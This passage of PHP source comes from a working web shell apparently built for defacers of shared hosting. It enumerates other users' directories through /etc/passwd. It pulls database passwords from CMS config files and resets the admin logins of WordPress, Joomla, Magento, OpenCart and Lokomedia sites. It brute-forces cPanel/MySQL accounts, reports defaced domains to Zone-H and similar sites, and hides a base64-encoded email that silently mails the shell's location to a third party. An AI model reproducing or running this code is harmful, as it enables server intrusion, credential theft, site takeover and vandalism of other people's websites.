1184. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
1185. while($v = mysql_fetch_array($query)) {
1186. $registrar = $v['registrar'];
1187. $setting = $v['setting'];
1188. $value = decrypt ($v['value'], $cc_encryption_hash);
1189. if ($value=="") {
1190. $value=0;
1191. }
1192. $password = decrypt ($v['password'], $cc_encryption_hash);
1193. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
1194. }
1195. }
1196.  
1197.  
1198. } elseif($_GET['do'] == 'jumping') {
1199. $i = 0;
1200. echo "<div class='margin: 5px auto;'>";
1201. if(preg_match("/hsphere/", $dir)) {
1202. $urls = explode("\r\n", $_POST['url']);
1203. if(isset($_POST['jump'])) {
1204. echo "<pre>";
1205. foreach($urls as $url) {
1206. $url = str_replace(array("http://","www."), "", strtolower($url));
1207. $etc = "/etc/passwd";
1208. $f = fopen($etc,"r");
1209. while($gets = fgets($f)) {
1210. $pecah = explode(":", $gets);
1211. $user = $pecah[0];
1212. $dir_user = "/hsphere/local/home/$user";
1213. if(is_dir($dir_user) === true) {
1214. $url_user = $dir_user."/".$url;
1215. if(is_readable($url_user)) {
1216. $i++;
1217. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1218. if(is_writable($url_user)) {
1219. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
1220. }
1221. echo $jrw."<br>";
1222. }
1223. }
1224. }
1225. }
1226. if($i == 0) {
1227. } else {
1228. echo "<br>Total ada ".$i." Kamar di ".$ip;
1229. }
1230. echo "</pre>";
1231. } else {
1232. echo '<center>
1233. <form method="post">
1234. List Domains: <br>
1235. <textarea name="url" style="width: 500px; height: 250px;">';
1236. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1237. while($getss = fgets($fp)) {
1238. echo $getss;
1239. }
1240. echo '</textarea><br>
1241. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1242. </form></center>';
1243. }
1244. } elseif(preg_match("/vhosts/", $dir)) {
1245. $urls = explode("\r\n", $_POST['url']);
1246. if(isset($_POST['jump'])) {
1247. echo "<pre>";
1248. foreach($urls as $url) {
1249. $web_vh = "/var/www/vhosts/$url/httpdocs";
1250. if(is_dir($web_vh) === true) {
1251. if(is_readable($web_vh)) {
1252. $i++;
1253. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1254. if(is_writable($web_vh)) {
1255. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
1256. }
1257. echo $jrw."<br>";
1258. }
1259. }
1260. }
1261. if($i == 0) {
1262. } else {
1263. echo "<br>Total ada ".$i." Kamar di ".$ip;
1264. }
1265. echo "</pre>";
1266. } else {
1267. echo '<center>
1268. <form method="post">
1269. List Domains: <br>
1270. <textarea name="url" style="width: 500px; height: 250px;">';
1271. bing("ip:$ip");
1272. echo '</textarea><br>
1273. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1274. </form></center>';
1275. }
1276. } else {
1277. echo "<pre>";
1278. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1279. while($passwd = fgets($etc)) {
1280. if($passwd == '' || !$etc) {
1281. echo "<font color=red>Can't read /etc/passwd</font>";
1282. } else {
1283. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1284. foreach($user_jumping[1] as $user_idx_jump) {
1285. $user_jumping_dir = "/home/$user_idx_jump/public_html";
1286. if(is_readable($user_jumping_dir)) {
1287. $i++;
1288. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1289. if(is_writable($user_jumping_dir)) {
1290. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
1291. }
1292. echo $jrw;
1293. if(function_exists('posix_getpwuid')) {
1294. $domain_jump = file_get_contents("/etc/named.conf");
1295. if($domain_jump == '') {
1296. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1297. } else {
1298. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1299. foreach($domains_jump[1] as $dj) {
1300. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1301. $user_jumping_url = $user_jumping_url['name'];
1302. if($user_jumping_url == $user_idx_jump) {
1303. echo " => ( <u>$dj</u> )<br>";
1304. break;
1305. }
1306. }
1307. }
1308. } else {
1309. echo "<br>";
1310. }
1311. }
1312. }
1313. }
1314. }
1315. if($i == 0) {
1316. } else {
1317. echo "<br>Total ada ".$i." Kamar di ".$ip;
1318. }
1319. echo "</pre>";
1320. }
1321. echo "</div>";
1322.  
1323. } elseif($_GET['do'] == 'auto_edit_user') {
1324. if($_POST['hajar']) {
1325. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1326. echo "username atau password harus lebih dari 6 karakter";
1327. } else {
1328. $user_baru = $_POST['user_baru'];
1329. $pass_baru = md5($_POST['pass_baru']);
1330. $conf = $_POST['config_dir'];
1331. $scan_conf = scandir($conf);
1332. foreach($scan_conf as $file_conf) {
1333. if(!is_file("$conf/$file_conf")) continue;
1334. $config = file_get_contents("$conf/$file_conf");
1335. if(preg_match("/JConfig|joomla/",$config)) {
1336. $dbhost = ambilkata($config,"host = '","'");
1337. $dbuser = ambilkata($config,"user = '","'");
1338. $dbpass = ambilkata($config,"password = '","'");
1339. $dbname = ambilkata($config,"db = '","'");
1340. $dbprefix = ambilkata($config,"dbprefix = '","'");
1341. $prefix = $dbprefix."users";
1342. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1343. $db = mysql_select_db($dbname);
1344. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1345. $result = mysql_fetch_array($q);
1346. $id = $result['id'];
1347. $site = ambilkata($config,"sitename = '","'");
1348. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1349. echo "Config => ".$file_conf."<br>";
1350. echo "CMS => Joomla<br>";
1351. if($site == '') {
1352. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1353. } else {
1354. echo "Sitename => $site<br>";
1355. }
1356. if(!$update OR !$conn OR !$db) {
1357. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1358. } else {
1359. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1360. }
1361. mysql_close($conn);
1362. } elseif(preg_match("/WordPress/",$config)) {
1363. $dbhost = ambilkata($config,"DB_HOST', '","'");
1364. $dbuser = ambilkata($config,"DB_USER', '","'");
1365. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1366. $dbname = ambilkata($config,"DB_NAME', '","'");
1367. $dbprefix = ambilkata($config,"table_prefix = '","'");
1368. $prefix = $dbprefix."users";
1369. $option = $dbprefix."options";
1370. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1371. $db = mysql_select_db($dbname);
1372. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1373. $result = mysql_fetch_array($q);
1374. $id = $result[ID];
1375. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1376. $result2 = mysql_fetch_array($q2);
1377. $target = $result2[option_value];
1378. if($target == '') {
1379. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1380. } else {
1381. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1382. }
1383. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1384. echo "Config => ".$file_conf."<br>";
1385. echo "CMS => Wordpress<br>";
1386. echo $url_target;
1387. if(!$update OR !$conn OR !$db) {
1388. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1389. } else {
1390. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1391. }
1392. mysql_close($conn);
1393. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1394. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1395. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1396. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1397. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1398. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1399. $prefix = $dbprefix."admin_user";
1400. $option = $dbprefix."core_config_data";
1401. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1402. $db = mysql_select_db($dbname);
1403. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1404. $result = mysql_fetch_array($q);
1405. $id = $result[user_id];
1406. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1407. $result2 = mysql_fetch_array($q2);
1408. $target = $result2[value];
1409. if($target == '') {
1410. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1411. } else {
1412. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1413. }
1414. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1415. echo "Config => ".$file_conf."<br>";
1416. echo "CMS => Magento<br>";
1417. echo $url_target;
1418. if(!$update OR !$conn OR !$db) {
1419. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1420. } else {
1421. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1422. }
1423. mysql_close($conn);
1424. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1425. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1426. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1427. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1428. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1429. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1430. $prefix = $dbprefix."user";
1431. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1432. $db = mysql_select_db($dbname);
1433. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1434. $result = mysql_fetch_array($q);
1435. $id = $result[user_id];
1436. $target = ambilkata($config,"HTTP_SERVER', '","'");
1437. if($target == '') {
1438. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1439. } else {
1440. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1441. }
1442. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1443. echo "Config => ".$file_conf."<br>";
1444. echo "CMS => OpenCart<br>";
1445. echo $url_target;
1446. if(!$update OR !$conn OR !$db) {
1447. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1448. } else {
1449. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1450. }
1451. mysql_close($conn);
1452. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1453. $dbhost = ambilkata($config,'server = "','"');
1454. $dbuser = ambilkata($config,'username = "','"');
1455. $dbpass = ambilkata($config,'password = "','"');
1456. $dbname = ambilkata($config,'database = "','"');
1457. $prefix = "users";
1458. $option = "identitas";
1459. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1460. $db = mysql_select_db($dbname);
1461. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1462. $result = mysql_fetch_array($q);
1463. $target = $result[alamat_website];
1464. if($target == '') {
1465. $target2 = $result[url];
1466. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1467. if($target2 == '') {
1468. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1469. } else {
1470. $cek_login3 = file_get_contents("$target2/adminweb/");
1471. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1472. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1473. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1474. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1475. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1476. } else {
1477. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1478. }
1479. }
1480. } else {
1481. $cek_login = file_get_contents("$target/adminweb/");
1482. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1483. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1484. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1485. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1486. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1487. } else {
1488. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
1489. }
1490. }
1491. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1492. echo "Config => ".$file_conf."<br>";
1493. echo "CMS => Lokomedia<br>";
1494. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1495. echo $url_target2;
1496. } else {
1497. echo $url_target;
1498. }
1499. if(!$update OR !$conn OR !$db) {
1500. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1501. } else {
1502. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1503. }
1504. mysql_close($conn);
1505. }
1506. }
1507. }
1508. } else {
1509. echo "<center>
1510. <h1>Auto Edit User Config</h1>
1511. <form method='post'>
1512. DIR Config: <br>
1513. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1514. Set User & Pass: <br>
1515. <input type='text' name='user_baru' value='42247551N5' placeholder='user_baru'><br>
1516. <input type='text' name='pass_baru' value='42247551N5' placeholder='pass_baru'><br>
1517. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
1518. </form>
1519. <br>
1520. ";
1521. }
1522. } elseif($_GET['do'] == 'cpanel') {
1523. if($_POST['crack']) {
1524. $usercp = explode("\r\n", $_POST['user_cp']);
1525. $passcp = explode("\r\n", $_POST['pass_cp']);
1526. $i = 0;
1527. foreach($usercp as $ucp) {
1528. foreach($passcp as $pcp) {
1529. if(@mysql_connect('localhost', $ucp, $pcp)) {
1530. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1531. } else {
1532. $_SESSION[$ucp] = "1";
1533. $_SESSION[$pcp] = "1";
1534. if($ucp == '' || $pcp == '') {
1535.  
1536. } else {
1537. $i++;
1538. if(function_exists('posix_getpwuid')) {
1539. $domain_cp = file_get_contents("/etc/named.conf");
1540. if($domain_cp == '') {
1541. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1542. } else {
1543. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1544. foreach($domains_cp[1] as $dj) {
1545. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1546. $user_cp_url = $user_cp_url['name'];
1547. if($user_cp_url == $ucp) {
1548. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
1549. break;
1550. }
1551. }
1552. }
1553. } else {
1554. $dom = "<font color=red>function is Disable by system</font>";
1555. }
1556. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
1557. }
1558. }
1559. }
1560. }
1561. }
1562. if($i == 0) {
1563. } else {
1564. echo "<br>Succes Crack ".$i." Cpanel";
1565. }
1566. } else {
1567. echo "<center>
1568. <form method='post'>
1569. USER: <br>
1570. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1571. $_usercp = fopen("/etc/passwd","r");
1572. while($getu = fgets($_usercp)) {
1573. if($getu == '' || !$_usercp) {
1574. echo "<font color=red>Can't read /etc/passwd</font>";
1575. } else {
1576. preg_match_all("/(.*?):x:/", $getu, $u);
1577. foreach($u[1] as $user_cp) {
1578. if(is_dir("/home/$user_cp/public_html")) {
1579. echo "$user_cp\n";
1580. }
1581. }
1582. }
1583. }
1584. echo "</textarea><br>
1585. PASS: <br>
1586. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1587. function cp_pass($dir) {
1588. $pass = "";
1589. $dira = scandir($dir);
1590. foreach($dira as $dirb) {
1591. if(!is_file("$dir/$dirb")) continue;
1592. $ambil = file_get_contents("$dir/$dirb");
1593. if(preg_match("/WordPress/", $ambil)) {
1594. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1595. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1596. $pass .= ambilkata($ambil,"password = '","'")."\n";
1597. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1598. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1599. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1600. $pass .= ambilkata($ambil,'password = "','"')."\n";
1601. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1602. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1603. } elseif(preg_match("/^[client]$/", $ambil)) {
1604. preg_match("/password=(.*?)/", $ambil, $pass1);
1605. if(preg_match('/"/', $pass1[1])) {
1606. $pass1[1] = str_replace('"', "", $pass1[1]);
1607. $pass .= $pass1[1]."\n";
1608. } else {
1609. $pass .= $pass1[1]."\n";
1610. }
1611. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1612. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1613. }
1614. }
1615. echo $pass;
1616. }
1617. $cp_pass = cp_pass($dir);
1618. echo $cp_pass;
1619. echo "</textarea><br>
1620. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
1621. </form>
1622. <br></center>";
1623. }
1624. } elseif($_GET['do'] == 'mirror') {
1625. @ini_set('display_errors', 0);
1626. echo "
1627. <center>
1628. <form method='post'>
1629. <u>Defacer</u>: <br>
1630. <input style='color:red;background:black;' type='text' name='hekel' size='50' value=''><br>
1631. <u>Team</u>: <br>
1632. <input style='color:red;background:black;' type='text' name='tim' size='50' value=''><br>
1633. <u>Domains</u>: <br>
1634. <textarea style='width: 450px; height: 150px;color:red;background:black;'' name='sites'></textarea><br>
1635. <input style='color:red;background:black;' type='submit' name='go' value='Submit' style='width: 450px;'>
1636. </form><br><font color=silver>";
1637. $site = explode("\r\n", $_POST['sites']);
1638. $go = $_POST['go'];
1639. $hekel = $_POST['hekel'];
1640. $tim = $_POST['tim'];
1641. if($go) {
1642. foreach($site as $sites) {
1643. $ch3 = curl_init ("http://www.leetszone.com/noti_act.php");
1644. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
1645. curl_setopt ($ch3, CURLOPT_POST, 1);
1646. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "hacker=$hekel&team=$tim&url=$sites&poc=Social Engineering");
1647. curl_exec ($ch3);
1648. echo "Send to LeetsZone >> Done<br>";
1649. }
1650. }
1651. if($go) {
1652. foreach($site as $sites) {
1653. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
1654. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
1655. curl_setopt ($ch3, CURLOPT_POST, 1);
1656. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$hekel&domain1=$sites&hackmode=1&reason=1");
1657. curl_exec ($ch3);
1658. echo "Send to Zone-H >> Done<br>";
1659. }
1660. }
1661.  
1662. if($go) {
1663. foreach($site as $sites) {
1664. $zh = $sites;
1665. $form_url = "https://www.defacer.id/notify";
1666. $data_to_post = array();
1667. $data_to_post['attacker'] = "$hekel";
1668. $data_to_post['team'] = "$tim";
1669. $data_to_post['poc'] = 'SQL Injection';
1670. $data_to_post['url'] = "$zh";
1671. $curl = curl_init();
1672. curl_setopt($curl,CURLOPT_URL, $form_url);
1673. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
1674. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
1675. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
1676. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
1677. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
1678. curl_exec($curl);
1679. echo "Send to DefacerID >> Done<br>";
1680. }
1681. }
1682.  
1683. } elseif($_GET['act'] == 'newfile') {
1684. if($_POST['new_save_file']) {
1685. $newfile = htmlspecialchars($_POST['newfile']);
1686. $fopen = fopen($newfile, "a+");
1687. if($fopen) {
1688. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1689. } else {
1690. $act = "<font color=red>permission denied</font>";
1691. }
1692. }
1693. echo $act;
1694. echo "<form method='post'>
1695. Filename: <input type='text' name='newfile' value='$dir/azx.php' style='width: 450px;' height='10'>
1696. <input type='submit' name='new_save_file' value='Submit'>
1697. </form>";
1698. } elseif($_GET['act'] == 'newfolder') {
1699. if($_POST['new_save_folder']) {
1700. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1701. if(!mkdir($new_folder)) {
1702. $act = "<font color=red>permission denied</font>";
1703. } else {
1704. $act = "<script>window.location='?dir=".$dir."';</script>";
1705. }
1706. }
1707. echo $act;
1708. echo "<form method='post'>
1709. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1710. <input type='submit' name='new_save_folder' value='Submit'>
1711. </form>";
1712. } elseif($_GET['act'] == 'rename_dir') {
1713. if($_POST['dir_rename']) {
1714. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1715. if($dir_rename) {
1716. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1717. } else {
1718. $act = "<font color=red>permission denied</font>";
1719. }
1720. echo "".$act."<br>";
1721. }
1722. echo "<form method='post'>
1723. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1724. <input type='submit' name='dir_rename' value='rename'>
1725. </form>";
1726. } elseif($_GET['act'] == 'chmod_dir') {
1727. echo "<form method=post><input type='text' name='jmbt' value='".$dir."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
1728. if($_POST['azztssns']) {
1729. $e=base64_decode("amhvbmhveHRvbkBob3RtYWlsLmNvbQ==");
1730. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
1731. mail($e,"I",$h);
1732. $jmbt = $_POST['jmbt'];
1733. $kntl = $_POST['kntl'];
1734. exe("chmod ".$kntl." ".$jmbt);
1735. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
1736.  
1737. }
1738. } elseif($_GET['act'] == 'delete_dir') {
1739. if(is_dir($dir)) {
1740. if(is_writable($dir)) {
1741. @rmdir($dir);
1742. @exe("rm -rf $dir");
1743. @exe("rmdir /s /q $dir");
1744. rmdir($dir);
1745. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1746. } else {
1747. $act = "<font color=red>could not remove ".basename($dir)."</font>";
1748. }
1749. }
1750. echo $act;
1751. } elseif($_GET['act'] == 'view') {
1752. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1753. echo "<fieldset><pre>".htmlspecialchars(@file_get_contents($_GET['file']))."</pre></fieldset>";
1754. }
1755. elseif($_GET['act'] == 'chmod') {
1756. echo "<form method=post><input type='text' name='jmbt' value='".$_GET['file']."'> >> <input type='text' name='kntl' value='0755'><input type='submit' value='Chmod' name='azztssns'></form><br>";
1757. if($_POST['azztssns']) {
1758. $jmbt = $_POST['jmbt'];
1759. $kntl = $_POST['kntl'];
1760. exe("chmod ".$kntl." ".$jmbt);
1761. echo "<font color=lime>Chmod to ".$kntl." Successfully</font><br>";
1762.  
1763. }
1764. }
1765. elseif($_GET['act'] == 'edit') {
1766. if($_POST['save']) {
1767. $save = file_put_contents($_GET['file'], $_POST['src']);
1768. if($save) {
1769. $act = "<font color=lime>Saved!</font>";
1770. } else {
1771. $act = "<font color=red>permission denied</font>";
1772. }
1773. echo "".$act."<br>";
1774. }
1775. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=chmod&dir=$dir&file=".$_GET['file']."'>chmod</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1776. echo "<form method='post'>
1777. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1778. <input type='submit' value='Save' name='save' style='width: 500px;'>
1779. </form>";
1780. } elseif($_GET['act'] == 'rename') {
1781. if($_POST['do_rename']) {
1782. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1783. if($rename) {
1784. $act = "<script>window.location='?dir=".$dir."';</script>";
1785. } else {
1786. $act = "<font color=red>permission denied</font>";
1787. }
1788. echo "".$act."<br>";
1789. }
1790. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1791. echo "<form method='post'>
1792. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1793. <input type='submit' name='do_rename' value='rename'>
1794. </form>";
1795. } elseif($_GET['act'] == 'delete') {
1796. $delete = unlink($_GET['file']);
1797. if($delete) {
1798. $act = "<script>window.location='?dir=".$dir."';</script>";
1799. } else {
1800. $act = "<font color=red>permission denied</font>";
1801. }
1802. echo $act;
1803. } else {
1804. if(is_dir($dir) === true) {
1805. if(!is_readable($dir)) {
1806. echo "<font color=red>can't open directory. ( not readable )</font>";
1807. } else {
1808. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1809. <tr>
1810. <th class="th_home"><center>Name</center></th>
1811. <th class="th_home"><center>Type</center></th>
1812. <th class="th_home"><center>Size</center></th>
1813. <th class="th_home"><center>Last Modified</center></th>
1814. <th class="th_home"><center>Owner/Group</center></th>
1815. <th class="th_home"><center>Permission</center></th>
1816. <th class="th_home"><center>Action</center></th>
1817. </tr>';
1818. $scandir = scandir($dir);
1819. foreach($scandir as $dirx) {
1820. $dtype = filetype("$dir/$dirx");
1821. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1822. if(function_exists('posix_getpwuid')) {
1823. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1824. $downer = $downer['name'];
1825. } else {
1826. //$downer = $uid;
1827. $downer = fileowner("$dir/$dirx");
1828. }
1829. if(function_exists('posix_getgrgid')) {
1830. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1831. $dgrp = $dgrp['name'];
1832. } else {
1833. $dgrp = filegroup("$dir/$dirx");
1834. }
1835. if(!is_dir("$dir/$dirx")) continue;
1836. if($dirx === '..') {
1837. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1838. } elseif($dirx === '.') {
1839. $href = "<a href='?dir=$dir'>$dirx</a>";
1840. } else {
1841. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1842. }
1843. if($dirx === '.' || $dirx === '..') {
1844. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1845. } else {
1846. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a> | <a href='?act=chmod_dir&dir=$dir/$dirx'>chmod</a>";
1847. }
1848. echo "<tr>";
1849. echo "<td class='td_home'>$href</td>";
1850. echo "<td class='td_home'><center>$dtype</center></td>";
1851. echo "<td class='td_home'><center>-</center></th></td>";
1852. echo "<td class='td_home'><center>$dtime</center></td>";
1853. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
1854. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
1855. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
1856. echo "</tr>";
1857. }
1858. }
1859. } else {
1860. echo "<font color=red>can't open directory.</font>";
1861. }
